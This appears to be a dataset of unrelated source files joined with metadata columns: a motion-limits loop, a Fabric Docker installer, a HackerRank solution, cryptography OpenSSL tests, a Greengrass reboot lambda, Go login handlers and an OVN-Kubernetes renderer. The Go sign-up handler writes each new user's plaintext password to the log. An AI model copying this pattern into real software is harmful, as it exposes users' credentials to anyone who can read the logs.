msg, safe_time, safe = look_ahead(frozen, config.pvs, moving, geometries, moves, ignore,
max_movement=driver.getParam('COARSE'))
if not safe and not any(collisions):
logger.write_to_log(msg, "MAJOR", "COLLIDE")
driver.setParam('MSG', msg)
else:
driver.setParam('MSG', collision_message)
logging.info(msg)
# Start timing for diagnostics
time_passed = time()
# Seek the correct limit values
dynamic_limits = auto_seek_limits(geometries, ignore, moves, frozen, config_limits,
coarse=driver.getParam('COARSE'), fine=driver.getParam('FINE'))
# Calculate and log the time taken to calculate
time_passed = (time() - time_passed) * 1000
# Log the new limits
logging.info("New limits calculated in %dms, are %s" % (time_passed, dynamic_limits))
# Set the limits according to the set_limits operating mode
if op_mode.set_limits.is_set():
# Apply the calculated limits
new_limits = dynamic_limits[:]
else:
# Restore the configuration limits
new_limits = config_limits[:]
# Update the render thread parameters
parameters.update_params(dynamic_limits, collisions, time_passed)
# # Update the PVs
driver.setParam('TIME', time_passed)
driver.setParam('HI_LIM', [l[1] for l in dynamic_limits])
driver.setParam('LO_LIM', [l[0] for l in dynamic_limits])
driver.setParam('TRAVEL', [min([l[0] - m, l[1] - m], key=abs)
for l, m in zip(dynamic_limits, frozen)])
driver.setParam('TRAV_F', [l[1] - m for l, m in zip(dynamic_limits, frozen)])
driver.setParam('TRAV_R', [l[0] - m for l, m in zip(dynamic_limits, frozen)])
driver.updatePVs()
if 'blind' not in sys.argv:
# On the first run, start the renderer
if renderer.is_alive() is False:
renderer.start()
op_mode.calc_limits.clear()
driver.setParam("CALC", False)
else:
# Restore the configuration limits
if op_mode.set_limits.is_set() is False:
new_limits = config_limits[:]
# Stop us overloading the limits
if not new_limits == old_limits:
threading.Thread(target=set_limits, args=(new_limits, pvs)).start()
old_limits = new_limits[:]
# Exit the program
if op_mode.close.is_set():
# Restore the configuration limits
set_limits(config_limits, pvs)
return
# Give the CPU a break
sleep(0.01)
if 'return' in sys.argv:
return
# Execute main
main()
| [] | [] | [
"MYDIRCD"
] | [] | ["MYDIRCD"] | python | 1 | 0 | |
rancher1.6/installer.py | from fabric import Connection
import os
def connectSSH():
return Connection(host=os.getenv('FAB_HOST'), user=os.getenv('FAB_USER'))
def updatePackages(conn):
updateResult = conn.run('sudo apt-get update')
def installHelperPackages(conn):
helperPackagesResult = conn.run('sudo apt-get install -y apt-transport-https ca-certificates curl software-properties-common')
def addDockerRepo(conn):
keyResult = conn.run('curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo apt-key add -')
addRepoResult = conn.run('sudo add-apt-repository "deb [arch=amd64] https://download.docker.com/linux/ubuntu $(lsb_release -cs) stable"')
def installDocker(conn):
installResult = conn.run('sudo apt-get update && sudo apt-get install -y docker-ce')
gpasswdResult = conn.run('sudo gpasswd -a $USER docker')
serviceResult = conn.run('sudo systemctl restart docker.service')
if __name__ == '__main__':
conn = connectSSH()
updatePackages(conn)
installHelperPackages(conn)
addDockerRepo(conn)
installDocker(conn) | [] | [] | [
"FAB_USER",
"FAB_HOST"
] | [] | ["FAB_USER", "FAB_HOST"] | python | 2 | 0 | |
HackerRank/Algorithm/Strings/TwoStrings.java | import java.io.*;
import java.math.*;
import java.security.*;
import java.text.*;
import java.util.*;
import java.util.concurrent.*;
import java.util.regex.*;
public class Solution {
// Complete the twoStrings function below.
static String twoStrings(String s1, String s2) {
HashSet<Character> hs = new HashSet<Character>();
for(int i=0;i<s1.length();i++){
hs.add(s1.charAt(i));
}
int count = 0;
for(int i=0;i<s2.length();i++){
if(hs.contains(s2.charAt(i))) {
count++;
break;
}
}
if(count==1) return "YES";
return "NO";
}
private static final Scanner scanner = new Scanner(System.in);
public static void main(String[] args) throws IOException {
BufferedWriter bufferedWriter = new BufferedWriter(new FileWriter(System.getenv("OUTPUT_PATH")));
int q = scanner.nextInt();
scanner.skip("(\r\n|[\n\r\u2028\u2029\u0085])?");
for (int qItr = 0; qItr < q; qItr++) {
String s1 = scanner.nextLine();
String s2 = scanner.nextLine();
String result = twoStrings(s1, s2);
bufferedWriter.write(result);
bufferedWriter.newLine();
}
bufferedWriter.close();
scanner.close();
}
}
| [
"\"OUTPUT_PATH\""
] | [] | [
"OUTPUT_PATH"
] | [] | ["OUTPUT_PATH"] | java | 1 | 0 | |
tests/hazmat/backends/test_openssl.py | # This file is dual licensed under the terms of the Apache License, Version
# 2.0, and the BSD License. See the LICENSE file in the root of this repository
# for complete details.
import itertools
import os
import subprocess
import sys
import textwrap
import pytest
from cryptography import x509
from cryptography.exceptions import InternalError, _Reasons
from cryptography.hazmat.backends.interfaces import DHBackend, RSABackend
from cryptography.hazmat.backends.openssl.backend import Backend, backend
from cryptography.hazmat.backends.openssl.ec import _sn_to_elliptic_curve
from cryptography.hazmat.primitives import hashes, serialization
from cryptography.hazmat.primitives.asymmetric import dh, dsa, padding
from cryptography.hazmat.primitives.ciphers import Cipher
from cryptography.hazmat.primitives.ciphers.algorithms import AES
from cryptography.hazmat.primitives.ciphers.modes import CBC
from ..primitives.fixtures_rsa import RSA_KEY_2048, RSA_KEY_512
from ...doubles import (
DummyAsymmetricPadding,
DummyCipherAlgorithm,
DummyHashAlgorithm,
DummyMode,
)
from ...utils import (
load_nist_vectors,
load_vectors_from_file,
raises_unsupported_algorithm,
)
from ...x509.test_x509 import _load_cert
def skip_if_libre_ssl(openssl_version):
if "LibreSSL" in openssl_version:
pytest.skip("LibreSSL hard-codes RAND_bytes to use arc4random.")
class TestLibreSkip(object):
def test_skip_no(self):
assert skip_if_libre_ssl("OpenSSL 1.0.2h 3 May 2016") is None
def test_skip_yes(self):
with pytest.raises(pytest.skip.Exception):
skip_if_libre_ssl("LibreSSL 2.1.6")
class DummyMGF(object):
_salt_length = 0
class TestOpenSSL(object):
def test_backend_exists(self):
assert backend
def test_openssl_version_text(self):
"""
This test checks the value of OPENSSL_VERSION_TEXT.
Unfortunately, this define does not appear to have a
formal content definition, so for now we'll test to see
if it starts with OpenSSL or LibreSSL as that appears
to be true for every OpenSSL-alike.
"""
assert backend.openssl_version_text().startswith(
"OpenSSL"
) or backend.openssl_version_text().startswith("LibreSSL")
def test_openssl_version_number(self):
assert backend.openssl_version_number() > 0
def test_supports_cipher(self):
assert backend.cipher_supported(None, None) is False
def test_register_duplicate_cipher_adapter(self):
with pytest.raises(ValueError):
backend.register_cipher_adapter(AES, CBC, None)
@pytest.mark.parametrize("mode", [DummyMode(), None])
def test_nonexistent_cipher(self, mode):
b = Backend()
b.register_cipher_adapter(
DummyCipherAlgorithm,
type(mode),
lambda backend, cipher, mode: backend._ffi.NULL,
)
cipher = Cipher(
DummyCipherAlgorithm(),
mode,
backend=b,
)
with raises_unsupported_algorithm(_Reasons.UNSUPPORTED_CIPHER):
cipher.encryptor()
def test_openssl_assert(self):
backend.openssl_assert(True)
with pytest.raises(InternalError):
backend.openssl_assert(False)
def test_consume_errors(self):
for i in range(10):
backend._lib.ERR_put_error(
backend._lib.ERR_LIB_EVP, 0, 0, b"test_openssl.py", -1
)
assert backend._lib.ERR_peek_error() != 0
errors = backend._consume_errors()
assert backend._lib.ERR_peek_error() == 0
assert len(errors) == 10
def test_ssl_ciphers_registered(self):
meth = backend._lib.SSLv23_method()
ctx = backend._lib.SSL_CTX_new(meth)
assert ctx != backend._ffi.NULL
backend._lib.SSL_CTX_free(ctx)
def test_evp_ciphers_registered(self):
cipher = backend._lib.EVP_get_cipherbyname(b"aes-256-cbc")
assert cipher != backend._ffi.NULL
def test_unknown_error_in_cipher_finalize(self):
cipher = Cipher(AES(b"\0" * 16), CBC(b"\0" * 16), backend=backend)
enc = cipher.encryptor()
enc.update(b"\0")
backend._lib.ERR_put_error(0, 0, 1, b"test_openssl.py", -1)
with pytest.raises(InternalError):
enc.finalize()
def test_large_key_size_on_new_openssl(self):
parameters = dsa.generate_parameters(2048, backend)
param_num = parameters.parameter_numbers()
assert param_num.p.bit_length() == 2048
parameters = dsa.generate_parameters(3072, backend)
param_num = parameters.parameter_numbers()
assert param_num.p.bit_length() == 3072
def test_int_to_bn(self):
value = (2 ** 4242) - 4242
bn = backend._int_to_bn(value)
assert bn != backend._ffi.NULL
bn = backend._ffi.gc(bn, backend._lib.BN_clear_free)
assert bn
assert backend._bn_to_int(bn) == value
def test_int_to_bn_inplace(self):
value = (2 ** 4242) - 4242
bn_ptr = backend._lib.BN_new()
assert bn_ptr != backend._ffi.NULL
bn_ptr = backend._ffi.gc(bn_ptr, backend._lib.BN_free)
bn = backend._int_to_bn(value, bn_ptr)
assert bn == bn_ptr
assert backend._bn_to_int(bn_ptr) == value
def test_bn_to_int(self):
bn = backend._int_to_bn(0)
assert backend._bn_to_int(bn) == 0
@pytest.mark.skipif(
not backend._lib.CRYPTOGRAPHY_NEEDS_OSRANDOM_ENGINE,
reason="Requires OpenSSL with ENGINE support and OpenSSL < 1.1.1d",
)
@pytest.mark.skip_fips(reason="osrandom engine disabled for FIPS")
class TestOpenSSLRandomEngine(object):
def setup(self):
# The default RAND engine is global and shared between
# tests. We make sure that the default engine is osrandom
# before we start each test and restore the global state to
# that engine in teardown.
current_default = backend._lib.ENGINE_get_default_RAND()
name = backend._lib.ENGINE_get_name(current_default)
assert name == backend._lib.Cryptography_osrandom_engine_name
def teardown(self):
# we need to reset state to being default. backend is a shared global
# for all these tests.
backend.activate_osrandom_engine()
current_default = backend._lib.ENGINE_get_default_RAND()
name = backend._lib.ENGINE_get_name(current_default)
assert name == backend._lib.Cryptography_osrandom_engine_name
@pytest.mark.skipif(
sys.executable is None, reason="No Python interpreter available."
)
def test_osrandom_engine_is_default(self, tmpdir):
engine_printer = textwrap.dedent(
"""
import sys
from cryptography.hazmat.backends.openssl.backend import backend
e = backend._lib.ENGINE_get_default_RAND()
name = backend._lib.ENGINE_get_name(e)
sys.stdout.write(backend._ffi.string(name).decode('ascii'))
res = backend._lib.ENGINE_free(e)
assert res == 1
"""
)
engine_name = tmpdir.join("engine_name")
# If we're running tests via ``python setup.py test`` in a clean
# environment then all of our dependencies are going to be installed
# into either the current directory or the .eggs directory. However the
# subprocess won't know to activate these dependencies, so we'll get it
# to do so by passing our entire sys.path into the subprocess via the
# PYTHONPATH environment variable.
env = os.environ.copy()
env["PYTHONPATH"] = os.pathsep.join(sys.path)
with engine_name.open("w") as out:
subprocess.check_call(
[sys.executable, "-c", engine_printer],
env=env,
stdout=out,
stderr=subprocess.PIPE,
)
osrandom_engine_name = backend._ffi.string(
backend._lib.Cryptography_osrandom_engine_name
)
assert engine_name.read().encode("ascii") == osrandom_engine_name
def test_osrandom_sanity_check(self):
# This test serves as a check against catastrophic failure.
buf = backend._ffi.new("unsigned char[]", 500)
res = backend._lib.RAND_bytes(buf, 500)
assert res == 1
assert backend._ffi.buffer(buf)[:] != "\x00" * 500
def test_activate_osrandom_no_default(self):
backend.activate_builtin_random()
e = backend._lib.ENGINE_get_default_RAND()
assert e == backend._ffi.NULL
backend.activate_osrandom_engine()
e = backend._lib.ENGINE_get_default_RAND()
name = backend._lib.ENGINE_get_name(e)
assert name == backend._lib.Cryptography_osrandom_engine_name
res = backend._lib.ENGINE_free(e)
assert res == 1
def test_activate_builtin_random(self):
e = backend._lib.ENGINE_get_default_RAND()
assert e != backend._ffi.NULL
name = backend._lib.ENGINE_get_name(e)
assert name == backend._lib.Cryptography_osrandom_engine_name
res = backend._lib.ENGINE_free(e)
assert res == 1
backend.activate_builtin_random()
e = backend._lib.ENGINE_get_default_RAND()
assert e == backend._ffi.NULL
def test_activate_builtin_random_already_active(self):
backend.activate_builtin_random()
e = backend._lib.ENGINE_get_default_RAND()
assert e == backend._ffi.NULL
backend.activate_builtin_random()
e = backend._lib.ENGINE_get_default_RAND()
assert e == backend._ffi.NULL
def test_osrandom_engine_implementation(self):
name = backend.osrandom_engine_implementation()
assert name in [
"/dev/urandom",
"CryptGenRandom",
"getentropy",
"getrandom",
]
if sys.platform.startswith("linux"):
assert name in ["getrandom", "/dev/urandom"]
if sys.platform == "darwin":
assert name in ["getentropy", "/dev/urandom"]
if sys.platform == "win32":
assert name == "CryptGenRandom"
def test_activate_osrandom_already_default(self):
e = backend._lib.ENGINE_get_default_RAND()
name = backend._lib.ENGINE_get_name(e)
assert name == backend._lib.Cryptography_osrandom_engine_name
res = backend._lib.ENGINE_free(e)
assert res == 1
backend.activate_osrandom_engine()
e = backend._lib.ENGINE_get_default_RAND()
name = backend._lib.ENGINE_get_name(e)
assert name == backend._lib.Cryptography_osrandom_engine_name
res = backend._lib.ENGINE_free(e)
assert res == 1
@pytest.mark.skipif(
backend._lib.CRYPTOGRAPHY_NEEDS_OSRANDOM_ENGINE,
reason="Requires OpenSSL without ENGINE support or OpenSSL >=1.1.1d",
)
class TestOpenSSLNoEngine(object):
def test_no_engine_support(self):
assert (
backend._ffi.string(backend._lib.Cryptography_osrandom_engine_id)
== b"no-engine-support"
)
assert (
backend._ffi.string(backend._lib.Cryptography_osrandom_engine_name)
== b"osrandom_engine disabled"
)
def test_activate_builtin_random_does_nothing(self):
backend.activate_builtin_random()
def test_activate_osrandom_does_nothing(self):
backend.activate_osrandom_engine()
class TestOpenSSLRSA(object):
def test_generate_rsa_parameters_supported(self):
assert backend.generate_rsa_parameters_supported(1, 1024) is False
assert backend.generate_rsa_parameters_supported(4, 1024) is False
assert backend.generate_rsa_parameters_supported(3, 1024) is True
assert backend.generate_rsa_parameters_supported(3, 511) is False
def test_generate_bad_public_exponent(self):
with pytest.raises(ValueError):
backend.generate_rsa_private_key(public_exponent=1, key_size=2048)
with pytest.raises(ValueError):
backend.generate_rsa_private_key(public_exponent=4, key_size=2048)
def test_cant_generate_insecure_tiny_key(self):
with pytest.raises(ValueError):
backend.generate_rsa_private_key(
public_exponent=65537, key_size=511
)
with pytest.raises(ValueError):
backend.generate_rsa_private_key(
public_exponent=65537, key_size=256
)
def test_rsa_padding_unsupported_pss_mgf1_hash(self):
assert (
backend.rsa_padding_supported(
padding.PSS(
mgf=padding.MGF1(DummyHashAlgorithm()), salt_length=0
)
)
is False
)
def test_rsa_padding_unsupported(self):
assert backend.rsa_padding_supported(DummyAsymmetricPadding()) is False
def test_rsa_padding_supported_pkcs1v15(self):
assert backend.rsa_padding_supported(padding.PKCS1v15()) is True
def test_rsa_padding_supported_pss(self):
assert (
backend.rsa_padding_supported(
padding.PSS(mgf=padding.MGF1(hashes.SHA1()), salt_length=0)
)
is True
)
def test_rsa_padding_supported_oaep(self):
assert (
backend.rsa_padding_supported(
padding.OAEP(
mgf=padding.MGF1(algorithm=hashes.SHA1()),
algorithm=hashes.SHA1(),
label=None,
),
)
is True
)
@pytest.mark.skipif(
backend._lib.Cryptography_HAS_RSA_OAEP_MD == 0,
reason="Requires OpenSSL with rsa_oaep_md (1.0.2+)",
)
def test_rsa_padding_supported_oaep_sha2_combinations(self):
hashalgs = [
hashes.SHA1(),
hashes.SHA224(),
hashes.SHA256(),
hashes.SHA384(),
hashes.SHA512(),
]
for mgf1alg, oaepalg in itertools.product(hashalgs, hashalgs):
assert (
backend.rsa_padding_supported(
padding.OAEP(
mgf=padding.MGF1(algorithm=mgf1alg),
algorithm=oaepalg,
label=None,
),
)
is True
)
def test_rsa_padding_unsupported_mgf(self):
assert (
backend.rsa_padding_supported(
padding.OAEP(
mgf=DummyMGF(), algorithm=hashes.SHA1(), label=None
),
)
is False
)
assert (
backend.rsa_padding_supported(
padding.PSS(mgf=DummyMGF(), salt_length=0)
)
is False
)
@pytest.mark.skipif(
backend._lib.Cryptography_HAS_RSA_OAEP_MD == 1,
reason="Requires OpenSSL without rsa_oaep_md (< 1.0.2)",
)
def test_unsupported_mgf1_hash_algorithm_decrypt(self):
private_key = RSA_KEY_512.private_key(backend)
with raises_unsupported_algorithm(_Reasons.UNSUPPORTED_PADDING):
private_key.decrypt(
b"0" * 64,
padding.OAEP(
mgf=padding.MGF1(algorithm=hashes.SHA256()),
algorithm=hashes.SHA1(),
label=None,
),
)
@pytest.mark.skipif(
backend._lib.Cryptography_HAS_RSA_OAEP_MD == 1,
reason="Requires OpenSSL without rsa_oaep_md (< 1.0.2)",
)
def test_unsupported_oaep_hash_algorithm_decrypt(self):
private_key = RSA_KEY_512.private_key(backend)
with raises_unsupported_algorithm(_Reasons.UNSUPPORTED_PADDING):
private_key.decrypt(
b"0" * 64,
padding.OAEP(
mgf=padding.MGF1(algorithm=hashes.SHA1()),
algorithm=hashes.SHA256(),
label=None,
),
)
def test_unsupported_mgf1_hash_algorithm_md5_decrypt(self):
private_key = RSA_KEY_512.private_key(backend)
with raises_unsupported_algorithm(_Reasons.UNSUPPORTED_PADDING):
private_key.decrypt(
b"0" * 64,
padding.OAEP(
mgf=padding.MGF1(algorithm=hashes.MD5()),
algorithm=hashes.MD5(),
label=None,
),
)
class TestOpenSSLCMAC(object):
def test_unsupported_cipher(self):
with raises_unsupported_algorithm(_Reasons.UNSUPPORTED_CIPHER):
backend.create_cmac_ctx(DummyCipherAlgorithm())
class TestOpenSSLSignX509Certificate(object):
def test_requires_certificate_builder(self):
private_key = RSA_KEY_2048.private_key(backend)
with pytest.raises(TypeError):
backend.create_x509_certificate(
object(), private_key, DummyHashAlgorithm()
)
class TestOpenSSLSignX509CSR(object):
def test_requires_csr_builder(self):
private_key = RSA_KEY_2048.private_key(backend)
with pytest.raises(TypeError):
backend.create_x509_csr(
object(), private_key, DummyHashAlgorithm()
)
class TestOpenSSLSignX509CertificateRevocationList(object):
def test_invalid_builder(self):
private_key = RSA_KEY_2048.private_key(backend)
with pytest.raises(TypeError):
backend.create_x509_crl(object(), private_key, hashes.SHA256())
class TestOpenSSLCreateRevokedCertificate(object):
def test_invalid_builder(self):
with pytest.raises(TypeError):
backend.create_x509_revoked_certificate(object())
class TestOpenSSLSerializationWithOpenSSL(object):
def test_pem_password_cb(self):
userdata = backend._ffi.new("CRYPTOGRAPHY_PASSWORD_DATA *")
pw = b"abcdefg"
password = backend._ffi.new("char []", pw)
userdata.password = password
userdata.length = len(pw)
buflen = 10
buf = backend._ffi.new("char []", buflen)
res = backend._lib.Cryptography_pem_password_cb(
buf, buflen, 0, userdata
)
assert res == len(pw)
assert userdata.called == 1
assert backend._ffi.buffer(buf, len(pw))[:] == pw
assert userdata.maxsize == buflen
assert userdata.error == 0
def test_pem_password_cb_no_password(self):
userdata = backend._ffi.new("CRYPTOGRAPHY_PASSWORD_DATA *")
buflen = 10
buf = backend._ffi.new("char []", buflen)
res = backend._lib.Cryptography_pem_password_cb(
buf, buflen, 0, userdata
)
assert res == 0
assert userdata.error == -1
def test_unsupported_evp_pkey_type(self):
key = backend._create_evp_pkey_gc()
with raises_unsupported_algorithm(None):
backend._evp_pkey_to_private_key(key)
with raises_unsupported_algorithm(None):
backend._evp_pkey_to_public_key(key)
def test_very_long_pem_serialization_password(self):
password = b"x" * 1024
with pytest.raises(ValueError):
load_vectors_from_file(
os.path.join(
"asymmetric",
"Traditional_OpenSSL_Serialization",
"key1.pem",
),
lambda pemfile: (
backend.load_pem_private_key(
pemfile.read().encode(), password
)
),
)
class TestOpenSSLEllipticCurve(object):
def test_sn_to_elliptic_curve_not_supported(self):
with raises_unsupported_algorithm(_Reasons.UNSUPPORTED_ELLIPTIC_CURVE):
_sn_to_elliptic_curve(backend, b"fake")
@pytest.mark.requires_backend_interface(interface=RSABackend)
class TestRSAPEMSerialization(object):
def test_password_length_limit(self):
password = b"x" * 1024
key = RSA_KEY_2048.private_key(backend)
with pytest.raises(ValueError):
key.private_bytes(
serialization.Encoding.PEM,
serialization.PrivateFormat.PKCS8,
serialization.BestAvailableEncryption(password),
)
class TestGOSTCertificate(object):
def test_numeric_string_x509_name_entry(self):
cert = _load_cert(
os.path.join("x509", "e-trust.ru.der"),
x509.load_der_x509_certificate,
backend,
)
if backend._lib.CRYPTOGRAPHY_IS_LIBRESSL:
with pytest.raises(ValueError) as exc:
cert.subject
# We assert on the message in this case because if the certificate
# fails to load it will also raise a ValueError and this test could
# erroneously pass.
assert str(exc.value) == "Unsupported ASN1 string type. Type: 18"
else:
assert (
cert.subject.get_attributes_for_oid(
x509.ObjectIdentifier("1.2.643.3.131.1.1")
)[0].value
== "007710474375"
)
@pytest.mark.skipif(
backend._lib.Cryptography_HAS_EVP_PKEY_DHX == 1,
reason="Requires OpenSSL without EVP_PKEY_DHX (< 1.0.2)",
)
@pytest.mark.requires_backend_interface(interface=DHBackend)
class TestOpenSSLDHSerialization(object):
@pytest.mark.parametrize(
"vector",
load_vectors_from_file(
os.path.join("asymmetric", "DH", "RFC5114.txt"), load_nist_vectors
),
)
def test_dh_serialization_with_q_unsupported(self, backend, vector):
parameters = dh.DHParameterNumbers(
int(vector["p"], 16), int(vector["g"], 16), int(vector["q"], 16)
)
public = dh.DHPublicNumbers(int(vector["ystatcavs"], 16), parameters)
private = dh.DHPrivateNumbers(int(vector["xstatcavs"], 16), public)
private_key = private.private_key(backend)
public_key = private_key.public_key()
with raises_unsupported_algorithm(_Reasons.UNSUPPORTED_SERIALIZATION):
private_key.private_bytes(
serialization.Encoding.PEM,
serialization.PrivateFormat.PKCS8,
serialization.NoEncryption(),
)
with raises_unsupported_algorithm(_Reasons.UNSUPPORTED_SERIALIZATION):
public_key.public_bytes(
serialization.Encoding.PEM,
serialization.PublicFormat.SubjectPublicKeyInfo,
)
with raises_unsupported_algorithm(_Reasons.UNSUPPORTED_SERIALIZATION):
parameters.parameters(backend).parameter_bytes(
serialization.Encoding.PEM, serialization.ParameterFormat.PKCS3
)
@pytest.mark.parametrize(
("key_path", "loader_func"),
[
(
os.path.join("asymmetric", "DH", "dhkey_rfc5114_2.pem"),
serialization.load_pem_private_key,
),
(
os.path.join("asymmetric", "DH", "dhkey_rfc5114_2.der"),
serialization.load_der_private_key,
),
],
)
def test_private_load_dhx_unsupported(
self, key_path, loader_func, backend
):
key_bytes = load_vectors_from_file(
key_path, lambda pemfile: pemfile.read(), mode="rb"
)
with pytest.raises(ValueError):
loader_func(key_bytes, None, backend)
@pytest.mark.parametrize(
("key_path", "loader_func"),
[
(
os.path.join("asymmetric", "DH", "dhpub_rfc5114_2.pem"),
serialization.load_pem_public_key,
),
(
os.path.join("asymmetric", "DH", "dhpub_rfc5114_2.der"),
serialization.load_der_public_key,
),
],
)
def test_public_load_dhx_unsupported(self, key_path, loader_func, backend):
key_bytes = load_vectors_from_file(
key_path, lambda pemfile: pemfile.read(), mode="rb"
)
with pytest.raises(ValueError):
loader_func(key_bytes, backend)
| [] | [] | [] | [] | [] | python | 0 | 0 | |
aws/lambdas/util/Reboot.py | #-------------------------------------------------------------------------------
# Name: Reboot.py
# Purpose: Reboot the device when a message is received
#-------------------------------------------------------------------------------
import greengrasssdk
import logging
import os
import igsdk.device
node_id = os.getenv('AWS_IOT_THING_NAME') or 'NO_THING_NAME'
#
# This handler receives all incoming messages (based on the topic subscription
# that was specified in the deployment). Only reboot when a message is
# received on this topic:
#
# device/<node_id>/reboot
#
def function_handler(event, context):
# Determine the topic
if context.client_context.custom and context.client_context.custom['subject']:
topic_el = context.client_context.custom['subject'].split('/')
if len(topic_el) == 3 and topic_el[0] == 'device' and topic_el[1] == node_id and topic_el[2] == 'reboot':
logging.info('Rebooting!')
igsdk.device.reboot(dev)
# Set up logging
logging.basicConfig()
logging.getLogger().setLevel(logging.INFO)
# Create a greengrass core sdk client
client = greengrasssdk.client('iot-data')
# Initialize the IGSDK device module
logging.info('Starting Reboot function.')
dev = igsdk.device.device_init()
| [] | [] | [
"AWS_IOT_THING_NAME"
] | [] | ["AWS_IOT_THING_NAME"] | python | 1 | 0 | |
views/sessionViews.go | package views
import (
"log"
"net/http"
"os"
"github.com/gorilla/context"
"github.com/gorilla/sessions"
"github.com/pbillerot/graduel/db"
)
// CodeSecure as
var CodeSecure = []byte(os.Getenv("SESSION_KEY"))
// Store as
var Store = sessions.NewCookieStore(CodeSecure)
//RequiresLogin is a middleware which will be used for each httpHandler to check if there is any active session
func RequiresLogin(handler func(w http.ResponseWriter, r *http.Request)) func(w http.ResponseWriter, r *http.Request) {
return func(w http.ResponseWriter, r *http.Request) {
session, _ := Store.Get(r, "session")
if session.Values["loggedin"] != true {
http.Redirect(w, r, "/login", 302)
return
}
handler(w, r)
}
}
//LogoutFunc Implements the logout functionality. WIll delete the session information from the cookie store
func LogoutFunc(w http.ResponseWriter, r *http.Request) {
session, err := Store.Get(r, "session")
if err == nil { //If there is no error, then remove session
if session.Values["loggedin"] != false {
session.Values["loggedin"] = false
session.Save(r, w)
}
}
GraduelAddContext(r)
http.Redirect(w, r, "/login", 302) //redirect to login irrespective of error or not
}
//LoginFunc implements the login functionality, will add a cookie to the cookie store for managing authentication
func LoginFunc(w http.ResponseWriter, r *http.Request) {
switch r.Method {
case "GET":
log.Println("LoginFunc context", context.GetAll(r))
GraduelAddContext(r)
loginTemplate.Execute(w, context.GetAll(r))
case "POST":
log.Print("Inside POST")
r.ParseForm()
username := r.Form.Get("username")
password := r.Form.Get("password")
if (username != "" && password != "") && db.ValidUser(username, password) {
session, _ := Store.Get(r, "session")
session.Values["loggedin"] = true
session.Values["username"] = username
session.Save(r, w)
log.Print("user ", username, " is authenticated")
GraduelAddContext(r)
http.Redirect(w, r, "/", 302)
return
}
log.Print("Invalid user " + username)
loginTemplate.Execute(w, context.GetAll(r))
default:
http.Redirect(w, r, "/login", http.StatusUnauthorized)
}
}
//SignUpFunc will enable new users to sign up to our service
func SignUpFunc(w http.ResponseWriter, r *http.Request) {
if r.Method != "POST" {
http.Redirect(w, r, "/", http.StatusBadRequest)
return
}
r.ParseForm()
username := r.Form.Get("username")
password := r.Form.Get("password")
email := r.Form.Get("email")
log.Println(username, password, email)
err := db.CreateUser(username, password, email)
if err != nil {
http.Error(w, "Unable to sign user up", http.StatusInternalServerError)
} else {
GraduelAddContext(r)
http.Redirect(w, r, "/login", 302)
}
}
| [
"\"SESSION_KEY\""
] | [] | [
"SESSION_KEY"
] | [] | ["SESSION_KEY"] | go | 1 | 0 | |
pkg/network/ovn_kubernetes.go | package network
import (
"context"
"fmt"
"log"
"math"
"net"
"net/url"
"os"
"path/filepath"
"reflect"
"sort"
"strconv"
"strings"
"time"
yaml "github.com/ghodss/yaml"
configv1 "github.com/openshift/api/config/v1"
operv1 "github.com/openshift/api/operator/v1"
routev1 "github.com/openshift/api/route/v1"
"github.com/openshift/cluster-network-operator/pkg/bootstrap"
"github.com/openshift/cluster-network-operator/pkg/client"
cnoclient "github.com/openshift/cluster-network-operator/pkg/client"
"github.com/openshift/cluster-network-operator/pkg/names"
"github.com/openshift/cluster-network-operator/pkg/render"
"github.com/openshift/cluster-network-operator/pkg/util/k8s"
hyperv1 "github.com/openshift/hypershift/api/v1alpha1"
"github.com/pkg/errors"
appsv1 "k8s.io/api/apps/v1"
corev1 "k8s.io/api/core/v1"
apierrors "k8s.io/apimachinery/pkg/api/errors"
metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
uns "k8s.io/apimachinery/pkg/apis/meta/v1/unstructured"
"k8s.io/apimachinery/pkg/runtime"
"k8s.io/apimachinery/pkg/runtime/schema"
types "k8s.io/apimachinery/pkg/types"
"k8s.io/apimachinery/pkg/util/wait"
"k8s.io/klog/v2"
utilnet "k8s.io/utils/net"
crclient "sigs.k8s.io/controller-runtime/pkg/client"
)
const OVN_NB_PORT = "9641"
const OVN_SB_PORT = "9642"
const OVN_NB_RAFT_PORT = "9643"
const OVN_SB_RAFT_PORT = "9644"
const CLUSTER_CONFIG_NAME = "cluster-config-v1"
const CLUSTER_CONFIG_NAMESPACE = "kube-system"
const OVN_CERT_CN = "ovn"
const OVN_MASTER_DISCOVERY_POLL = 5
const OVN_MASTER_DISCOVERY_BACKOFF = 120
const OVN_LOCAL_GW_MODE = "local"
const OVN_SHARED_GW_MODE = "shared"
const OVN_LOG_PATTERN_CONSOLE = "%D{%Y-%m-%dT%H:%M:%S.###Z}|%05N|%c%T|%p|%m"
const OVN_NODE_MODE_FULL = "full"
const OVN_NODE_MODE_DPU_HOST = "dpu-host"
const OVN_NODE_MODE_DPU = "dpu"
const OVN_NODE_SELECTOR_DPU = "network.operator.openshift.io/dpu: ''"
var OVN_MASTER_DISCOVERY_TIMEOUT = 250
const (
// TODO: get this from the route Status
OVN_SB_DB_ROUTE_PORT = "443"
OVN_SB_DB_ROUTE_LOCAL_PORT = "9645"
OVSFlowsConfigMapName = "ovs-flows-config"
OVSFlowsConfigNamespace = names.APPLIED_NAMESPACE
)
// renderOVNKubernetes returns the manifests for the ovn-kubernetes.
// This creates
// - the openshift-ovn-kubernetes namespace
// - the ovn-config ConfigMap
// - the ovnkube-node daemonset
// - the ovnkube-master deployment
// and some other small things.
func renderOVNKubernetes(conf *operv1.NetworkSpec, bootstrapResult *bootstrap.BootstrapResult, manifestDir string) ([]*uns.Unstructured, bool, error) {
var progressing bool
// TODO: Fix operator behavior when running in a cluster with an externalized control plane.
// For now, return an error since we don't have any master nodes to run the ovn-master daemonset.
if bootstrapResult.Infra.ExternalControlPlane && !bootstrapResult.OVN.OVNKubernetesConfig.HyperShiftConfig.Enabled {
return nil, progressing, fmt.Errorf("Unable to render OVN in a cluster with an external control plane")
}
c := conf.DefaultNetwork.OVNKubernetesConfig
objs := []*uns.Unstructured{}
apiServer := bootstrapResult.Infra.APIServers[bootstrap.APIServerDefault]
localAPIServer := bootstrapResult.Infra.APIServers[bootstrap.APIServerDefaultLocal]
// render the manifests on disk
data := render.MakeRenderData()
data.Data["ReleaseVersion"] = os.Getenv("RELEASE_VERSION")
data.Data["OvnImage"] = os.Getenv("OVN_IMAGE")
data.Data["KubeRBACProxyImage"] = os.Getenv("KUBE_RBAC_PROXY_IMAGE")
data.Data["KUBERNETES_SERVICE_HOST"] = apiServer.Host
data.Data["KUBERNETES_SERVICE_PORT"] = apiServer.Port
